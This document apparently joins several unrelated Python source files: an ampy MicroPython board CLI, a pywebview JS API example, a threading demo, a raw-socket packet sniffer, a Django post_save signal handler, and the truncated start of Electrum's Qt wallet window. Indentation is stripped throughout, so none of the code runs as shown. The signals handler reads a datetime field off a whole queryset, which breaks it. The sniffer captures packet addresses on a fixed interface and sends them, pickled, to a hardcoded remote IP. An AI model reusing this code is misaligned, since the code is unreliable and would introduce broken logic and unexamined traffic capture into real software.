cli.py
|
# Adafruit MicroPython Tool - Command Line Interface
# Author: Tony DiCola
# Copyright (c) 2016 Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Change Logs:
# Date          Author        Notes
# 2019-10-10    SummerGift    Improve the code architecture
from __future__ import print_function
import os
import platform
import posixpath
import re
import serial
import serial.serialutil
import serial.tools.list_ports
import threading
import click
import dotenv
import sys
import time
import hashlib
import json
import ampy.files as files
import ampy.pyboard as pyboard
import gc
from ampy.getch import getch
from ampy.file_sync import file_sync_info
from ampy.file_sync import _get_file_crc32
from ampy.pyboard import stdout
# Load AMPY_PORT et al from .ampy file
# Performed here because we need to beat click's decorators.
config = dotenv.find_dotenv(filename=".ampy", usecwd=True)
if config:
dotenv.load_dotenv(dotenv_path=config)
serial_reader_running = None
serial_out_put_enable = True
serial_out_put_count = 0
_board = None
_system = None
class CliError(Exception):
pass
def windows_full_port_name(portname):
# Helper function to generate proper Windows COM port paths. Windows
# requires COM ports numbered 10 and above to use a special device path,
# while COM1 through COM9 can be referred to by name directly. See this
# post for more info and where this code came from:
# http://eli.thegreenplace.net/2009/07/31/listing-all-serial-ports-on-windows-with-python/
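# For example, the mapping this helper performs:
#   windows_full_port_name("COM3")  -> "COM3"
#   windows_full_port_name("COM12") -> "\\.\COM12"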
m = re.match(r"^COM(\d+)$", portname)
if m and int(m.group(1)) < 10:
return portname
else:
return "\\\\.\\{0}".format(portname)
@click.group()
@click.option(
"--port",
"-p",
envvar="AMPY_PORT",
required=True,
type=click.STRING,
help="Name of serial port for connected board. Can optionally specify with AMPY_PORT environment variable.",
metavar="PORT",
)
@click.option(
"--baud",
"-b",
envvar="AMPY_BAUD",
default=115200,
type=click.INT,
help="Baud rate for the serial connection (default 115200). Can optionally specify with AMPY_BAUD environment variable.",
metavar="BAUD",
)
@click.option(
"--delay",
"-d",
envvar="AMPY_DELAY",
default=0,
type=click.FLOAT,
help="Delay in seconds before entering RAW MODE (default 0). Can optionally specify with AMPY_DELAY environment variable.",
metavar="DELAY",
)
@click.version_option()
def cli(port, baud, delay):
"""ampy - Adafruit MicroPython Tool
Ampy is a tool to control MicroPython boards over a serial connection. Using
ampy you can manipulate files on the board's internal filesystem and even run
scripts.
"""
global _board
global _system
if platform.system() == "Windows":
_system = "Windows"
if platform.system() == "Linux":
_system = "Linux"
if port != "query":
# On Windows fix the COM port path name for ports above 9 (see comment in
# windows_full_port_name function).
if platform.system() == "Windows":
port = windows_full_port_name(port)
_board = pyboard.Pyboard(port, baudrate=baud, rawdelay=delay)
@cli.command()
@click.argument("remote_file")
@click.argument("local_file", type=click.File("wb"), required=False)
def get(remote_file, local_file):
"""
Retrieve a file from the board.
Get will download a file from the board and print its contents or save it
locally. You must pass at least one argument which is the path to the file
to download from the board. If you don't specify a second argument then
the file contents will be printed to standard output. However if you pass
a file name as the second argument then the contents of the downloaded file
will be saved to that file (overwriting anything inside it!).
For example to retrieve the boot.py and print it out run:
ampy --port /board/serial/port get boot.py
Or to get main.py and save it as main.py locally run:
ampy --port /board/serial/port get main.py main.py
"""
# Get the file contents.
board_files = files.Files(_board)
contents = board_files.get(remote_file)
# Print the file out if no local file was provided, otherwise save it.
if local_file is None:
print(contents.decode("utf-8"))
else:
local_file.write(contents)
@cli.command()
@click.option(
"--exists-okay", is_flag=True, help="Ignore if the directory already exists."
)
@click.argument("directory")
def mkdir(directory, exists_okay):
"""
Create a directory on the board.
Mkdir will create the specified directory on the board. One argument is
required, the full path of the directory to create.
Note that you cannot recursively create a hierarchy of directories with one
mkdir command; instead, create each parent directory with a separate mkdir
call.
For example to make a directory under the root called 'code':
ampy --port /board/serial/port mkdir /code
"""
# Run the mkdir command.
board_files = files.Files(_board)
board_files.mkdir(directory, exists_okay=exists_okay)
@cli.command()
@click.argument("directory", default="/")
@click.option(
"--long_format",
"-l",
is_flag=True,
help="Print long format info including size of files. Note the size of directories is not supported and will show 0 values.",
)
@click.option(
"--recursive",
"-r",
is_flag=True,
help="recursively list all files and (empty) directories.",
)
def ls(directory, long_format, recursive):
"""List contents of a directory on the board.
Can pass an optional argument which is the path to the directory. The
default is to list the contents of the root, /, path.
For example to list the contents of the root run:
ampy --port /board/serial/port ls
Or to list the contents of the /foo/bar directory on the board run:
ampy --port /board/serial/port ls /foo/bar
Add the -l or --long_format flag to print the size of files (however note
MicroPython does not calculate the size of folders and will show 0 bytes):
ampy --port /board/serial/port ls -l /foo/bar
"""
# List each file/directory on a separate line.
board_files = files.Files(_board)
for f in board_files.ls(directory, long_format=long_format, recursive=recursive):
print(f)
@cli.command()
@click.argument("local", type=click.Path(exists=True))
@click.argument("remote", required=False)
def put(local, remote):
"""Put a file or folder and its contents on the board.
Put will upload a local file or folder to the board. If the file already
exists on the board it will be overwritten with no warning! You must pass
at least one argument which is the path to the local file/folder to
upload. If the item to upload is a folder then it will be copied to the
board recursively with its entire child structure. You can pass a second
optional argument which is the path and name of the file/folder to create
on the connected board.
For example to upload a main.py from the current directory to the board's
root run:
ampy --port /board/serial/port put main.py
Or to upload a board_boot.py from a ./foo subdirectory and save it as boot.py
in the board's root run:
ampy --port /board/serial/port put ./foo/board_boot.py boot.py
To upload a local folder adafruit_library and all of its child files/folders
as an item under the board's root run:
ampy --port /board/serial/port put adafruit_library
Or to put a local folder adafruit_library on the board under the path
/lib/adafruit_library on the board run:
ampy --port /board/serial/port put adafruit_library /lib/adafruit_library
"""
# Use the local filename if no remote filename is provided.
if remote is None:
remote = os.path.basename(os.path.abspath(local))
# Check if path is a folder and do recursive copy of everything inside it.
# Otherwise it's a file and should simply be copied over.
if os.path.isdir(local):
# Directory copy, create the directory and walk all children to copy
# over the files.
dir_del_flag = True
board_files = files.Files(_board)
for parent, child_dirs, child_files in os.walk(local):
# Create board filesystem absolute path to parent directory.
remote_parent = posixpath.normpath(
posixpath.join(remote, os.path.relpath(parent, local))
)
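# For example (hypothetical paths): local="lib", remote="/lib" and
# parent="lib/foo" give remote_parent="/lib/foo".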
try:
# If the directory already exists, remove it first; only performed once.
if dir_del_flag:
board_files.rmdir(remote_parent, missing_okay=True)
dir_del_flag = False
# Create remote parent directory.
board_files.mkdir(remote_parent)
# Loop through all the files and put them on the board too.
for filename in child_files:
with open(os.path.join(parent, filename), "rb") as infile:
remote_filename = posixpath.join(remote_parent, filename)
board_files.put(remote_filename, infile.read())
except files.DirectoryExistsError:
# Ignore errors for directories that already exist.
pass
else:
# File copy, open the file and copy its contents to the board.
# Put the file on the board.
with open(local, "rb") as infile:
board_files = files.Files(_board)
board_files.put(remote, infile.read())
@cli.command()
@click.argument("remote_file")
def rm(remote_file):
"""Remove a file from the board.
Remove the specified file from the board's filesystem. Must specify one
argument which is the path to the file to delete. Note that this can't
delete directories which have files inside them, but can delete empty
directories.
For example to delete main.py from the root of a board run:
ampy --port /board/serial/port rm main.py
"""
# Delete the provided file/directory on the board.
board_files = files.Files(_board)
board_files.rm(remote_file)
@cli.command()
@click.option(
"--missing-okay", is_flag=True, help="Ignore if the directory does not exist."
)
@click.argument("remote_folder")
def rmdir(remote_folder, missing_okay):
"""Forcefully remove a folder and all its children from the board.
Remove the specified folder from the board's filesystem. Must specify one
argument which is the path to the folder to delete. This will delete the
directory and ALL of its children recursively, use with caution!
For example to delete everything under /adafruit_library from the root of a
board run:
ampy --port /board/serial/port rmdir adafruit_library
"""
# Delete the provided file/directory on the board.
board_files = files.Files(_board)
board_files.rmdir(remote_folder, missing_okay=missing_okay)
@cli.command()
@click.argument("local_file")
@click.option(
"--no-output",
"-n",
is_flag=True,
help="Run the code without waiting for it to finish and print output. Use this when running code with main loops that never return.",
)
@click.option(
"--device_file",
"-d",
envvar="run file in device",
default=0,
type=click.STRING,
help="run file in device",
metavar="run file in device",
)
def run(local_file, no_output, device_file):
"""Run a script and print its output.
Run will send the specified file to the board and execute it immediately.
Any output from the board will be printed to the console (note that this is
not a 'shell' and you can't send input to the program).
Note that if your code has a main or infinite loop you should add the --no-output
option. This will run the script and immediately exit without waiting for
the script to finish and print output.
For example to run a test.py script and print any output after it finishes:
ampy --port /board/serial/port run test.py
Or to run test.py and not wait for it to finish:
ampy --port /board/serial/port run --no-output test.py
"""
# Run the provided file and print its output.
board_files = files.Files(_board)
try:
if device_file:
output = board_files.run_in_device(device_file, not no_output)
else:
output = board_files.run(local_file, not no_output)
if output is not None:
print(output.decode("utf-8"), end="")
except IOError:
click.echo(
"Failed to find or read input file: {0}".format(local_file), err=True
)
@cli.command()
@click.option(
"--bootloader", "mode", flag_value="BOOTLOADER", help="Reboot into the bootloader"
)
@click.option(
"--hard",
"mode",
flag_value="NORMAL",
help="Perform a hard reboot, including running init.py",
)
@click.option(
"--repl",
"mode",
flag_value="SOFT",
default=True,
help="Perform a soft reboot, entering the REPL [default]",
)
@click.option(
"--safe",
"mode",
flag_value="SAFE_MODE",
help="Perform a safe-mode reboot. User code will not be run and the filesystem will be writeable over USB",
)
def reset(mode):
"""Perform soft reset/reboot of the board.
Will connect to the board and perform a reset. Depending on the board
and firmware, several different types of reset may be supported.
ampy --port /board/serial/port reset
"""
_board.enter_raw_repl()
if mode == "SOFT":
_board.exit_raw_repl()
return
_board.exec_(
"""if 1:
def on_next_reset(x):
try:
import microcontroller
except:
if x == 'NORMAL': return ''
return 'Reset mode only supported on CircuitPython'
try:
microcontroller.on_next_reset(getattr(microcontroller.RunMode, x))
except ValueError as e:
return str(e)
return ''
def reset():
try:
import microcontroller
except:
import machine as microcontroller
microcontroller.reset()
"""
)
r = _board.eval("on_next_reset({})".format(repr(mode)))
print("here we are", repr(r))
if r:
click.echo(r, err=True)
return
try:
_board.exec_("reset()")
except serial.serialutil.SerialException as e:
# An error is expected to occur, as the board should disconnect from
# serial when restarted via microcontroller.reset()
pass
def repl_serial_to_stdout(serial):
global _system
global serial_out_put_count
def hexsend(string_data=b''):
# bytes.fromhex() replaces the Python 2-only str.decode("hex").
hex_data = bytes.fromhex(string_data.decode())
return hex_data
try:
data = b''
while serial_reader_running:
count = serial.inWaiting()
if count == 0:
time.sleep(0.01)
continue
if count > 0:
try:
data += serial.read(count)
if len(data) < 20:
try:
data.decode()
except UnicodeDecodeError:
continue
if data != b'':
if serial_out_put_enable and serial_out_put_count > 0:
if _system == "Linux":
sys.stdout.buffer.write(data)
else:
sys.stdout.buffer.write(data.replace(b"\r", b""))
sys.stdout.buffer.flush()
else:
serial.write(hexsend(data))
data = b''
serial_out_put_count += 1
except serial.serialutil.SerialException:
# This happens if the pyboard reboots, or a USB port
# goes away.
return
except TypeError:
# This is a bug in serialposix.py starting with python 3.3
# which causes a TypeError during the handling of the
# select.error. So we treat this the same as
# serial.serialutil.SerialException:
return
except ConnectionResetError:
# This happens over a telnet session, if it resets
return
except KeyboardInterrupt:
if serial is not None:
serial.close()
@cli.command()
@click.option(
"--query",
"-q",
envvar="query_is_can_be_connected",
# required=True,
default=None,
type=click.STRING,
help="Query whether the com port can be connected",
metavar="query",
)
def repl(query=None):
global serial_reader_running
global serial_out_put_enable
global serial_out_put_count
serial_out_put_count = 1
serial_reader_running = True
if query is not None:
return
_board.read_until_hit()
serial = _board.serial
repl_thread = threading.Thread(target = repl_serial_to_stdout, args=(serial,), name='REPL_serial_to_stdout')
repl_thread.daemon = True
repl_thread.start()
try:
# Wake up the prompt
serial.write(b'\r')
count = 0
while True:
char = getch()
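# Special keys handled below: Ctrl-V (0x16) is forwarded as Ctrl-C (0x03)
# to interrupt the board, Ctrl-G (0x07) pauses printing of serial output,
# Ctrl-O (0x0F) resumes it, and Ctrl-X (0x18) exits REPL mode.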
if char == b'\x16':
char = b'\x03'
count += 1
if count == 1000:
time.sleep(0.1)
count = 0
if char == b'\x07':
serial_out_put_enable = False
continue
if char == b'\x0F':
serial_out_put_enable = True
serial_out_put_count = 0
continue
if char == b'\x00':
continue
if not char:
continue
if char == b'\x18': # enter ctrl + x to exit repl mode
serial_reader_running = False
# When using telnet with the WiPy, it doesn't support
# an initial timeout. So for the meantime, we send a
# space which should cause the wipy to echo back a
# space which will wakeup our reader thread so it will
# notice the quit.
serial.write(b' ')
# Give the reader thread a chance to detect the quit
# then we don't have to call getch() above again which
# means we'd need to wait for another character.
time.sleep(0.1)
# Print a newline so that the rshell prompt looks good.
print('')
# We stay in the loop so that we can still enter
# characters until we detect the reader thread quitting
# (mostly to cover off weird states).
return
if char == b'\n':
serial.write(b'\r')
else:
serial.write(char)
except Exception as err:
# The device is no longer present.
print('')
sys.stdout.flush()
print(err, file=sys.stderr)
print("exit repl")
repl_thread.join()
@cli.command()
@click.option(
"--local_path",
"-l",
envvar="local_path",
required=True,
default=0,
type=click.STRING,
help="local_path",
metavar="local_path",
)
@click.option(
"--file_pathname",
"-f",
envvar="file_pathname",
required=True,
default=0,
type=click.STRING,
help="file pathname",
metavar="file_pathname",
)
@click.option(
"--remote_path",
"-r",
envvar="remote_path",
required=True,
default=0,
type=click.STRING,
help="remote_path",
metavar="remote_path",
)
@click.option(
"--info_pathname",
"-i",
envvar="info_pathname",
# required=True,
default=None,
type=click.STRING,
help="info_pathname",
metavar="info_pathname",
)
@click.option(
"--query",
"-q",
envvar="query",
# required=True,
default=None,
type=click.STRING,
help="query",
metavar="query",
)
def sync(local_path, file_pathname, remote_path = None, info_pathname = None, query = None):
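"""Synchronize a local directory with the board's filesystem.
A sketch of the flow implemented below: compare the files under --local_path
against the cached board file information in --info_pathname (created from the
board's own file listing if missing), upload files reported as needing sync,
remove files reported as deleted, update the cache, and soft-reset the board.
Pass --query ifneedsync to only report whether a sync is required.
"""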
def _sync_file(sync_info, local, remote = None):
local = local.replace('\\', '/')
delete_file_list = sync_info["delete"]
sync_file_list = sync_info["sync"]
if delete_file_list == [] and sync_file_list == []:
return
board_files = files.Files(_board)
# Directory copy, create the directory and walk all children to copy
# over the files.
for parent, child_dirs, child_files in os.walk(local):
# Create board filesystem absolute path to parent directory.
remote_parent = posixpath.normpath(
posixpath.join(local, os.path.relpath(parent, local))
)
try:
# Create remote parent directory.
dir_name = remote_parent[len(local_path) + 1:]
if dir_name != "":
board_files.mkdir(dir_name)
# Loop through all the files and put them on the board too.
except files.DirectoryExistsError:
# Ignore errors for directories that already exist.
pass
# add sync files
for item in sync_file_list:
# File copy, open the file and copy its contents to the board.
# Put the file on the board.
print("file to add:%s"%item)
item_local = os.path.join(local_path, item).replace('\\', '/')
with open(item_local, "rb") as infile:
board_files = files.Files(_board)
board_files.put(item, infile.read())
# delete files
for item in delete_file_list:
# Delete the provided file/directory on the board.
# board_files.rmdir(item, True)
print("file to del:%s"%item)
if item != '':
board_files.rm(item)
# Check whether a sync is needed without performing it.
if query == "ifneedsync":
if not os.path.exists(info_pathname):
print("<file need sync>")
else:
# Gets file synchronization information
sync_info, pc_file_info = file_sync_info(local_path, info_pathname)
if sync_info['delete'] == [] and sync_info['sync'] == []:
print("<no need to sync>")
else:
print("<file need sync>")
return
# Check that the board's firmware provides the uos module and detect RT-Thread MicroPython.
_board.get_board_identity()
if not _board.is_have_uos():
raise pyboard.PyboardError('Error: The uos module is not enabled')
rtt_version_flag = False
if _board.is_rtt_micropython():
rtt_version_flag = True
# ready to sync
if info_pathname is None:
info_pathname = "file_info.json"
if not os.path.exists(info_pathname):
# List each file/directory on a separate line.
board_files = files.Files(_board)
board_files._ls_sync(long_format=True, recursive=True, pathname = info_pathname)
# Gets file synchronization information
sync_info, pc_file_info = file_sync_info(local_path, info_pathname, rtt_version_flag)
# print("sync_info------------------------------")
# print(sync_info)
# print("pc_file_info------------------------------")
# print(pc_file_info)
if sync_info['delete'] == [] and sync_info['sync'] == []:
print("<no need to sync>")
return
try:
# Perform file synchronization
_sync_file(sync_info, local_path)
except Exception:
raise CliError("error: _sync_file failed, please restart and retry.")
# After successful file synchronization, update the local cache file information
with open(info_pathname, 'w') as f:
f.write(str(pc_file_info))
_board.soft_reset_board()
@cli.command()
def portscan():
"""Scan all serial ports on your system."""
port_list = list(serial.tools.list_ports.comports())
if len(port_list) <= 0:
print("can't find any serial in system.")
else:
print([list(port_list[i])[0] for i in range(0, len(port_list))])
del port_list
gc.collect()
# os._exit(0)
if __name__ == "__main__":
try:
cli()
finally:
# Try to ensure the board serial connection is always gracefully closed.
if _board is not None:
try:
_board.close()
except:
# Swallow errors when attempting to close as it's just a best effort
# and shouldn't cause a new error or problem if the connection can't
# be closed.
pass
|
js_api.py
|
import webview
import threading
import time
import sys
import random
"""
This example demonstrates how to create a pywebview api without using a web
server
"""
html = """
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<style>
#response-container {
display: none;
padding: 3rem;
margin: 3rem 5rem;
font-size: 120%;
border: 5px dashed #ccc;
}
button {
font-size: 100%;
padding: 0.5rem;
margin: 0.3rem;
text-transform: uppercase;
}
</style>
</head>
<body>
<h1>JS API Example</h1>
<button onClick="initialize()">Hello Python</button><br/>
<button id="heavy-stuff-btn" onClick="doHeavyStuff()">Perform a heavy operation</button><br/>
<button onClick="getRandomNumber()">Get a random number</button><br/>
<div id="response-container"></div>
<script>
function showResponse(response) {
var container = document.getElementById('response-container')
container.innerText = response.message
container.style.display = 'block'
}
function initialize() {
pywebview.api.init().then(showResponse)
}
function doHeavyStuff() {
var btn = document.getElementById('heavy-stuff-btn')
pywebview.api.doHeavyStuff().then(function(response) {
showResponse(response)
btn.onclick = doHeavyStuff
btn.innerText = 'Perform a heavy operation'
})
showResponse({message: 'Working...'})
btn.innerText = 'Cancel the heavy operation'
btn.onclick = cancelHeavyStuff
}
function cancelHeavyStuff() {
pywebview.api.cancelHeavyStuff()
}
function getRandomNumber() {
pywebview.api.getRandomNumber().then(showResponse)
}
</script>
</body>
</html>
"""
class Api:
def __init__(self):
self.cancel_heavy_stuff_flag = False
def init(self, params):
response = {
'message': 'Hello from Python {0}'.format(sys.version)
}
return response
def getRandomNumber(self, params):
response = {
'message': 'Here is a random number courtesy of randint: {0}'.format(random.randint(0, 100000000))
}
return response
def doHeavyStuff(self, params):
time.sleep(0.1) # sleep to prevent the UI thread from freezing for a moment
now = time.time()
self.cancel_heavy_stuff_flag = False
for i in range(0, 1000000):
_ = i * random.randint(0, 1000)
if self.cancel_heavy_stuff_flag:
response = {'message': 'Operation cancelled'}
break
else:
then = time.time()
response = {
'message': 'Operation took {0:.1f} seconds on the thread {1}'.format((then - now), threading.current_thread())
}
return response
def cancelHeavyStuff(self, params):
time.sleep(0.1)
self.cancel_heavy_stuff_flag = True
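# Note: this example appears to target an older, module-level pywebview API in
# which create_window() blocks the calling thread, so load_html() is called
# from a separate thread.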
def create_app():
webview.load_html(html)
if __name__ == '__main__':
t = threading.Thread(target=create_app)
t.start()
api = Api()
webview.create_window('API example', js_api=api)
|
thread.py
|
import logging
import threading
import time
import concurrent.futures
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(2)
logging.info("Thread %s: finishing", name)
def launch_one_daemon_thread():
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,), daemon=True)
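# daemon=True means the thread will not keep the interpreter alive on exit;
# the explicit join() below still waits for it to finish.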
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
x.join()
logging.info("Main : all done")
def launch_multiple_threads(thread_count):
threads = list()
for index in range(thread_count):
logging.info("Main : create and start thread %d.", index)
x = threading.Thread(target=thread_function, args=(index,))
threads.append(x)
x.start()
for index, thread in enumerate(threads):
logging.info("Main : before joining thread %d.", index)
thread.join()
logging.info("Main : thread %d done", index)
def launch_thread_pool_executor(thread_count):
with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:
executor.map(thread_function, range(thread_count))
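# Leaving the "with" block implicitly calls executor.shutdown(wait=True),
# which joins all worker threads before returning.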
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format,
level=logging.INFO,
datefmt="%H:%M:%S")
launch_thread_pool_executor(3)
|
statSender.py
|
import pika
import sys
import socket
import struct
import binascii
import netifaces as ni
import pickle
import threading
import time
import logging
encoding = "utf-8"
class Messenger:
def __init__(self,server_address):
self.server_address = server_address
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def send(self,payload):
self.sock.sendto(payload,self.server_address)
logging.info("sent to Collector {}".format(payload))
def close(self):
self.sock.close()
class Sniffer(Messenger):
def __init__(self,server_address):
super(Sniffer,self).__init__(server_address)
self.s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.IPPROTO_IP)
self.s.bind(("brl700000F", 0x0800))
self.ip4 = ni.ifaddresses("brl700000F")[ni.AF_INET][0]['addr']
self.snifferThread = threading.Thread(target=self.startSniffing)
self.snifferThread.start()
self.snifferThread.join()
def startSniffing(self):
while True:
packet = self.s.recvfrom(10000)
ethernet_header = packet[0][0:14]
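# "!6s6s2s": destination MAC (6 bytes), source MAC (6 bytes),
# EtherType (2 bytes), all in network byte order.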
eth_header = struct.unpack("!6s6s2s", ethernet_header)
logging.info("Destination MAC:" + str(binascii.hexlify(eth_header[0]),encoding) + " Source MAC:" + str(binascii.hexlify(eth_header[1]),encoding)
+ " Type:" + str(binascii.hexlify(eth_header[2]),encoding))
ipheader = packet[0][14:34]
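# "!12s4s4s": the first 12 bytes of the IPv4 header (ignored here), then
# the 4-byte source and destination addresses.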
ip_header = struct.unpack("!12s4s4s", ipheader)
srcIP = socket.inet_ntoa(ip_header[1])
dstIP = socket.inet_ntoa(ip_header[2])
packet_info = "Source IP: {} Destination IP: {}".format(srcIP,dstIP)
packet_info = "Receiver: {} ".format(self.ip4)+packet_info
payload = {"Receiver":self.ip4, "SrcIP":socket.inet_ntoa(ip_header[1]), "DstIP":socket.inet_ntoa(ip_header[2])}
payload = pickle.dumps(payload)
logging.info(packet_info)
self.send(payload)
if __name__=="__main__":
format = "%(asctime)s %(message)s"
logging.basicConfig(format=format,datefmt="%H:%M:%S",level=logging.INFO)
remote = '130.127.133.198'
server_address = (remote, 10000)
sniffer = Sniffer(server_address)
|
signals.py
|
from datetime import timedelta
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth import get_user_model
from django.utils import timezone
from django.utils.datetime_safe import datetime
from todo_app.models import Verification, Post
from todo_app.tasks import warning_email
from threading import Thread
User = get_user_model()
#
# @receiver(post_save, sender=Verification, dispatch_uid='send_mail_to_user')
# def send_mail_to_user(*args, **kwargs):
# obj = kwargs.get("instance")
# created = kwargs.get("created")
# if created:
# link = f"http://localhost:8008/verify/{obj.token}/{obj.user_id}/"
# background_job = Thread(target=warning_email, args=(obj.user.email, link))
# background_job.start()
#
#
@receiver(post_save, sender=Verification, dispatch_uid='send_mail_to_user')
def send_mail_to_user(*args, **kwargs):
obj = kwargs.get("instance")
now = datetime.now(timezone.utc)
post = Post.objects.all()
date = post.datetime - now - timedelta(seconds=600)
link = f"http://localhost:8000/"
warning_email.apply_async(args=(obj.user.email, link), eta=now + date)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
